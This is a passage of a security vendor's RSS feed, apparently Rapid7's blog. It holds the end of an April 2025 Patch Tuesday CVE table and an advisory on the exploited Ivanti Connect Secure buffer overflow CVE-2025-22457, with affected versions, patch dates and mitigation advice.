Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26667">CVE-2025-26667</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27474">CVE-2025-27474</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21203">CVE-2025-21203</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26672">CVE-2025-26672</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26676">CVE-2025-26676</a></td><td>Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27738">CVE-2025-27738</a></td><td>Windows Resilient File System (ReFS) Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-21197">CVE-2025-21197</a></td><td>Windows NTFS Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27471">CVE-2025-27471</a></td><td>Microsoft Streaming Service Denial of Service Vulnerability</td><td>No</td><td>No</td><td>5.9</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27742">CVE-2025-27742</a></td><td>NTFS Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>5.5</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27472">CVE-2025-27472</a></td><td>Windows Mark of the Web Security Feature Bypass Vulnerability</td><td>No</td><td>No</td><td>5.4</td></tr></tbody></table><h3>Windows ESU Microsoft Office vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26687">CVE-2025-26687</a></td><td>Win32k Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr></tbody></table><div><h4>NEVER MISS AN EMERGING THREAT</h4><p>Be the first to learn about the latest vulnerabilities and cybersecurity news.</p><a href="#">Subscribe Now</a></div>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/08/patch-tuesday-april-2025</link>
      <guid isPermaLink="false">blt80de1fc2e087e4c2</guid>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Patch Tuesday]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 08 Apr 2025 20:30:03 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9952397815d84355/6849acff3860836b5c360685/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Ivanti Connect Secure CVE-2025-22457 exploited in the wild]]></title>
      <description><![CDATA[<p>On Thursday, April 3, 2025, Ivanti <a href="https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US">disclosed</a> a critical severity vulnerability affecting Ivanti Connect Secure, Pulse Connect Secure, Policy Secure, and ZTA Gateways. CVE-2025-22457 is a stack-based buffer overflow vulnerability that allows remote, unauthenticated attackers to execute code on the target device. Ivanti’s advisory indicates that CVE-2025-22457 is known to be exploited in the wild; Google’s Mandiant division <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability">attributes</a> this activity to suspected China-nexus actors.</p><p>Ivanti’s advisory indicates that the vulnerability was “initially identified as a product bug” and patched in Ivanti Connect Secure version 22.7R2.6 (released February 11, 2025). Per Mandiant, CVE-2025-22457 is “a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability.” However, on April 3, Ivanti publicly acknowledged known exploitation in the wild of supported Ivanti Connect Secure and End-of-Support Pulse Connect Secure appliances for remote code execution in some customer environments.</p><p><strong>Update April 10, 2025: </strong>Rapid7's vulnerability research team now has a <a href="https://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis">full root cause analysis</a> of this vulnerability in AttackerKB; Rapid7 Principal Researcher <a href="https://bsky.app/profile/stephenfewer.bsky.social">Stephen Fewer</a> was able to demonstrate full RCE, though notably the vulnerability is not trivial to exploit.</p><h3>Mitigation guidance</h3><p>The following products and versions are vulnerable to <strong>CVE-2025-22457:</strong></p><ul><li>Ivanti Connect Secure 22.7R2.5 and prior</li><li>Pulse Connect Secure (End-of-Support) 9.1R18.9 and prior</li><li>Ivanti Policy Secure 22.7R1.3 and prior</li><li>ZTA Gateways 22.8R2 and prior</li></ul><p>Ivanti has a full table of affected versions and corresponding solution estimates in their <a href="https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US">advisory</a>. </p><p>A patch <strong>is available</strong> (initially released on February 11, 2025) for CVE-2025-22457 in Ivanti Connect Secure. However, the advisory states that patches for Ivanti Policy Secure and ZTA Gateways <strong>will not be available</strong> until April 21, 2025 and April 19, 2025, respectively. Pulse Connect Secure 9.1x reached End-of-Support on December 31, 2024 and won’t be patched. For the latest information, please refer to the Ivanti <a href="https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US">advisory</a>.</p><p>Customers should apply the available Ivanti Connect Secure patch immediately, without waiting for a typical patch cycle to occur. Ivanti’s advisory notes that “Customers should monitor their external ICT and look for web server crashes. If your ICT result shows signs of compromise, you should perform a factory reset on the appliance and then put the appliance back into production using version 22.7R2.6.” Notably, ICT results may vary; a factory reset should be performed if exploitation is suspected, regardless of ICT results.</p><p>For the latest information, please refer to the vendor <a href="https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US">advisory</a>.</p><h3>Rapid7 customers</h3><p>InsightVM and Nexpose customers can assess their exposure to CVE-2025-22457 in Ivanti Connect Secure with a vulnerability check available in today’s (April 3, 2025) content release.</p><p><br/></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/03/etr-ivanti-connect-secure-cve-2025-22457-exploited-in-the-wild</link>
      <guid isPermaLink="false">bltf6eaeb679b0b56a0</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Ryan Emmons]]></dc:creator>
      <pubDate>Thu, 03 Apr 2025 18:50:02 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1083dca4c4e27e90/683ddf18e3c8aac62b830d0a/emergent-threat-banner.jpeg" medium="image" />
    </item>
  </channel>
</rss>